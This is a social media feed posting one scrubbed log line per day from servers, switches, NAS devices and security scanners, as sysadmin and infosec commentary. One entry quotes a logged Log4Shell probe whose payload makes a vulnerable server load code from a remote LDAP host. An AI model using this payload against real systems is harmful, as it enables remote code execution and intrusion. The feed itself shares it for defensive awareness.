@dailylogline.bsky.social
I stare at logs so they don’t stare back at you. One real log line every day: Linux, Windows, firewalls, switches, SaaS. Scrubbed of IPs, names and other sins.
2025-12-12T11:57:08.833613+01:00 [local-server01]auditd[690]: Audit daemon rotating log files
#cybersecurity #infosec #devops #sysadmin
2025-12-11T20:25:49.709405+01:00 [local-server01]Hyper-V VSS: VSS: op=THAW: succeeded
#cybersecurity #devops #infosec #sysadmin
[06:26:42] Checking for possible rootkit strings [ None found ]
#cybersecurity #infosec #sysadmin #devops
A security-enabled local group was changed.
#cybersecurity #infosec #sysadmin #devops
An attempt was made to reset an account's password.
#cybersecurity #sysadmin #infosec #devops
2025-12-05T03:17:01.896742+01:00 [local-server01] CRON[1514120]: (root) CMD (cd / && run-parts --report /etc/cron.hourly)
#sysadmin #cybersecurity #infosec #devops
[local-nas01] qulogd: event log:[QVPN Service] Connection log information. Date: 28.11.2025 07:41:13, Uptime: , Username: [user01], Source: [remote-ip01], Client IP: , Transmission rate: , Receiving rate: , Protocol: L2TP/IPSec, Connection status: Login Fail.
#sysadmin #infosec #cybersecurity
2025-12-05T11:17:01.367968+01:00 [local-server01] CRON[1538920]: pam_unix(cron:session): session closed for user root
#sysadmin #infosec #devops #cybersecurity
2024-10-31 13:11:16 Lynis ended successfully.
#sysadmin #devops #infosec #cybersecurity
[06:27:33] Info: Starting test name 'trojans'
#sysadmin #infosec #cybersecurity #devops
500 Internal Server Error
You can do better #cloudflare !
#sysadmin #infosec #cybersecurity #devops
HTTP/1.1 500 Internal Server Error
Date: Thu, 04 Dec 2025 06:16:39 GMT
0:{"a":"$@1","f":"","b":"yd-J8UfWl70zwtaAy83s7"}
1:E{"digest":"2971658870"}
Go patch!
#react2shell #react #next.js #sysadmin #infosec #cybersecurity
[local-switch01] 00413 SNTP: Updated time by 4 seconds from server at [remote-server01]. Previous time was Sat Nov 29 05:58:28 2025. Current time is Sat Nov 29 05:58:32 2025.
#sysadmin #devops #infosec #cybersecurity
NetFlowV5 [remote-ip01]:443 <> [local-ip01]:62632 proto:6 pkts:63 bytes:51325
#sysadmin #infosec #devops
[local-switch01] 03396 system: The security log wrap around has occurred.
#sysadmin #devops #infosec
2025-11-28T06:27:36.624108+01:00 [local-server01] rkhunter: Please inspect this machine, because it may be infected.
#sysadmin #infosec #devops
2025-11-28 04:17:31,225:ERROR:certbot._internal.log:1 renew failure(s), 0 parse failure(s)
#sysadmin #devops #infosec
Fri Nov 28 14:00:11 2025 -> SelfCheck: Database status OK.
#sysadmin #devops #infosec
Failure to load the application settings for package Microsoft.Windows.Cortana
#sysadmin #infosec #windows
Intel(R) Ethernet Connection (23) I219-LM
Network link is disconnected.
#sysadmin #devops #tech
[!] FILE: /var/log/[redacted]/2021_12_13.request.log LINE_NUMBER: 8 DEOBFUSCATED_STRING: ${jndi:ldap: LINE: [remote-server01] - - [13/Dez/2021:02:02:36 +0000] "GET https://[local-server01]/$%7Bjndi:ldap://[remote-server01]:1389/Exploit%7D HTTP/1.1" 404 277
Dec 2021 in one line.
#sysadmin #infosec
Mon Nov 24 06:18:36 2025 psad v2.4.6 pid: 1062 whois alarm at /usr/sbin/psad line 7559
#sysadmin #network #devops
2025-11-24T14:44:40.964946+01:00 [local-server01] kernel: [1065765.199456] [UFW AUDIT] IN=ens6 OUT= MAC=[redacted] SRC=[remote-server01] DST=[local-server01] LEN=44 TOS=0x00 PREC=0x00 TTL=240 ID=41853 PROTO=TCP SPT=6102 DPT=22 WINDOW=1025 RES=0x00 SYN URGP=0
UFW FTW!
#linux #sysadmin #devops #logs
